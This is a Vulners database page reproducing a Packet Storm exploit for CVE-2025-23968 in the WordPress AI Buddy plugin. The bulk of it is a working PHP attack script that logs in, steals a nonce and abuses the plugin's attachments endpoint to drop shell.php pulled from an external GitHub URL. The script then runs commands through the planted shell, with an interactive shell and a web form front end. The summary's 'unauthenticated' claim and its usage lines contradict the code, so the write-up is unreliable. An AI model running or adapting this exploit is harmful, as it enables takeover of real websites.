Vulners
Lucene search
📄 WordPress AI Bud 1.8.5 Shell Upload
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Exploit for CVE-2025-23968 | 3 Jul 202519:34 | – | githubexploit |
 | CVE-2025-23968 | 3 Jul 202521:40 | – | circl |
 | WordPress plugin AiBud WP 代码问题漏洞 | 3 Jul 202500:00 | – | cnnvd |
 | CVE-2025-23968 | 3 Jul 202518:49 | – | cve |
 | CVE-2025-23968 WordPress AiBud WP plugin <= 1.9 - Arbitrary File Upload vulnerability | 3 Jul 202518:49 | – | cvelist |
 | EUVD-2025-19896 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-23968 | 3 Jul 202519:15 | – | nvd |
 | 📄 AI Plugins 1.10.9 Shell Upload | 3 Dec 202500:00 | – | packetstorm |
| 📄 WordPress AI Buddy 1.8.5 Shell Upload | 5 Dec 202500:00 | – | packetstorm |
| 📄 WordPress AI Buddy 1.8.5 Shell Upload | 4 Mar 202600:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : AI Bud 1.8.5 Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://ai.cibeles.net/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/210977/ & CVE-2025-23968
[+] Summary :
an unauthenticated arbitrary file upload vulnerability in the AI Bud 1.8.5 plugin v 1.8.5 and earlier.
The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the GitHub integration functionality, leading to remote code execution and complete server compromise.
The vulnerability exists in the actualizador_git.php file which provides unauthenticated access to download and execute files from arbitrary GitHub repositories without proper security controls.
[+] POC :
# Execute a single command
php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'`
# Interactive shell
php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i`
# Create a shell for the repo
php poc.php --create-shell`
<?php
/**
* AI Buddy Plugin <= 1.8.5 - Authenticated Arbitrary File Upload RCE Exploit (CVE-2025-23968)
* Author: indoushka
* Vendor: https://wpcenter.io/
* Vulnerable Versions: <= 1.8.5
*/
class AIBuddyExploit {
private $target;
private $cookies;
public function __construct($target_url) {
$this->target = rtrim($target_url, '/');
$this->cookies = [];
}
public function wp_login($username, $password) {
echo "[*] Logging into WordPress...\n";
$login_data = http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $this->target . '/wp-admin',
'testcookie' => '1'
]);
$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n" .
"Cookie: wordpress_test_cookie=WP Cookie check\r\n",
'content' => $login_data,
'follow_location' => false
]
]);
$response = file_get_contents($this->target . '/wp-login.php', false, $context);
// Extract cookies from response headers
if (isset($http_response_header)) {
foreach ($http_response_header as $header) {
if (strpos($header, 'Set-Cookie:') === 0) {
$cookie = trim(substr($header, 11));
$cookie_parts = explode(';', $cookie);
$name_value = explode('=', $cookie_parts[0], 2);
if (count($name_value) === 2) {
$this->cookies[$name_value[0]] = $name_value[1];
}
}
}
}
if (isset($this->cookies['wordpress_logged_in'])) {
echo "[+] Successfully logged in\n";
return true;
} else {
echo "[-] Login failed\n";
return false;
}
}
public function get_cookie_header() {
$cookie_string = '';
foreach ($this->cookies as $name => $value) {
$cookie_string .= $name . '=' . $value . '; ';
}
return rtrim($cookie_string, '; ');
}
public function extract_nonce() {
echo "[*] Extracting AI Buddy nonce...\n";
$context = stream_context_create([
'http' => [
'method' => 'GET',
'header' => "Cookie: " . $this->get_cookie_header() . "\r\n"
]
]);
$response = file_get_contents($this->target . '/wp-admin/tools.php', false, $context);
if ($response === false) {
echo "[-] Failed to access tools.php\n";
return null;
}
// Extract nonce using regex
$pattern = '/<script id="ai_buddy_admin_scripts-js-extra">.*?var ai_buddy_localized_data = (.*?);\s*<\/script>/s';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
$data = json_decode($matches[1], true);
if (isset($data['ai_buddy_image_post_attachment']['nonce'])) {
$nonce = $data['ai_buddy_image_post_attachment']['nonce'];
echo "[+] Nonce found: " . $nonce . "\n";
return $nonce;
}
}
echo "[-] Failed to extract nonce\n";
return null;
}
public function upload_shell($nonce) {
echo "[*] Uploading web shell via AI Buddy...\n";
$payload = [
"title" => "hack",
"caption" => "the",
"alt" => "planet",
"description" => "Hack the Planet!",
"url" => "https://raw.githubusercontent.com/d0n601/d0n601/refs/heads/master/test.jpg",
"filename" => "shell.php"
];
$json_payload = json_encode($payload);
$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => "Content-Type: application/json; charset=UTF-8\r\n" .
"X-Wp-Nonce: " . $nonce . "\r\n" .
"Cookie: " . $this->get_cookie_header() . "\r\n",
'content' => $json_payload
]
]);
$response = file_get_contents($this->target . '/wp-json/ai-buddy/v1/wp/attachments', false, $context);
if ($response === false) {
echo "[-] File upload failed\n";
return false;
}
$result = json_decode($response, true);
if (isset($result['success']) && $result['success']) {
echo "[+] Web shell uploaded successfully\n";
// Try to find the shell URL
$shell_url = $this->find_shell_url();
if ($shell_url) {
echo "[+] Shell accessible at: " . $shell_url . "\n";
return $shell_url;
}
} else {
echo "[-] Upload failed. Response: " . $response . "\n";
}
return false;
}
private function find_shell_url() {
$current_year = date('Y');
$current_month = date('m');
$possible_paths = [
"/wp-content/uploads/{$current_year}/{$current_month}/shell.php",
"/wp-content/uploads/shell.php",
"/wp-content/uploads/ai-buddy/shell.php"
];
foreach ($possible_paths as $path) {
$test_url = $this->target . $path . '?cmd=echo+AI_BUDDY_TEST';
$context = stream_context_create([
'http' => [
'method' => 'GET'
]
]);
$response = @file_get_contents($test_url, false, $context);
if ($response !== false && strpos($response, 'AI_BUDDY_TEST') !== false) {
return $this->target . $path;
}
}
// If not found, return the most likely path
return $this->target . "/wp-content/uploads/{$current_year}/{$current_month}/shell.php";
}
public function execute_command($shell_url, $command) {
echo "[*] Executing command: " . $command . "\n";
$test_url = $shell_url . '?cmd=' . urlencode($command);
$context = stream_context_create([
'http' => [
'method' => 'GET'
]
]);
$response = @file_get_contents($test_url, false, $context);
if ($response === false) {
echo "[-] Command execution failed\n";
} else {
echo "[+] Command output:\n";
echo $response . "\n";
}
return $response;
}
public function interactive_shell($shell_url) {
echo "[+] Starting interactive shell...\n";
echo "[+] Type 'exit' to quit\n\n";
while (true) {
echo "cmd> ";
$command = trim(fgets(STDIN));
if ($command === 'exit') {
break;
}
if (!empty($command)) {
$this->execute_command($shell_url, $command);
}
}
}
public function exploit($username, $password, $command = null) {
if (!$this->wp_login($username, $password)) {
return false;
}
$nonce = $this->extract_nonce();
if (!$nonce) {
return false;
}
$shell_url = $this->upload_shell($nonce);
if (!$shell_url) {
return false;
}
if ($command) {
$this->execute_command($shell_url, $command);
} else {
$this->interactive_shell($shell_url);
}
return true;
}
}
// Command line interface
if (php_sapi_name() === 'cli') {
echo "
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
AI Buddy <= 1.8.5 Authenticated RCE Exploit (CVE-2025-23968)
By: indoushka
\n";
if ($argc < 4) {
echo "Usage: php ai_buddy_exploit.php <target> <username> <password> [command]\n";
echo "Examples:\n";
echo " php ai_buddy_exploit.php https://target.com admin password123\n";
echo " php ai_buddy_exploit.php https://target.com admin password123 'whoami'\n";
exit(1);
}
$target = $argv[1];
$username = $argv[2];
$password = $argv[3];
$command = $argc > 4 ? $argv[4] : null;
$exploit = new AIBuddyExploit($target);
$exploit->exploit($username, $password, $command);
} else {
// Web interface
if (isset($_POST['exploit'])) {
$target = $_POST['target'] ?? '';
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
$command = $_POST['command'] ?? null;
if ($target && $username && $password) {
$exploit = new AIBuddyExploit($target);
ob_start();
$result = $exploit->exploit($username, $password, $command);
$output = ob_get_clean();
echo "<pre>$output</pre>";
} else {
echo "<div style='color: red;'>All fields are required</div>";
}
} else {
echo '<!DOCTYPE html>
<html>
<head>
<title>AI Buddy RCE Exploit</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.container { max-width: 600px; margin: 0 auto; }
.form-group { margin-bottom: 15px; }
label { display: block; margin-bottom: 5px; font-weight: bold; }
input[type="text"], input[type="password"] {
width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px;
}
button {
background: #007cba; color: white; padding: 10px 20px;
border: none; border-radius: 4px; cursor: pointer;
}
</style>
</head>
<body>
<div class="container">
<h1>AI Buddy RCE Exploit (CVE-2025-23968)</h1>
<form method="post">
<input type="hidden" name="exploit" value="1">
<div class="form-group">
<label for="target">Target URL:</label>
<input type="text" id="target" name="target" placeholder="https://example.com" required>
</div>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
</div>
<div class="form-group">
<label for="command">Command (optional):</label>
<input type="text" id="command" name="command" placeholder="whoami">
</div>
<button type="submit">Execute Exploit</button>
</form>
</div>
</body>
</html>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.1
EPSS0.00413
SSVC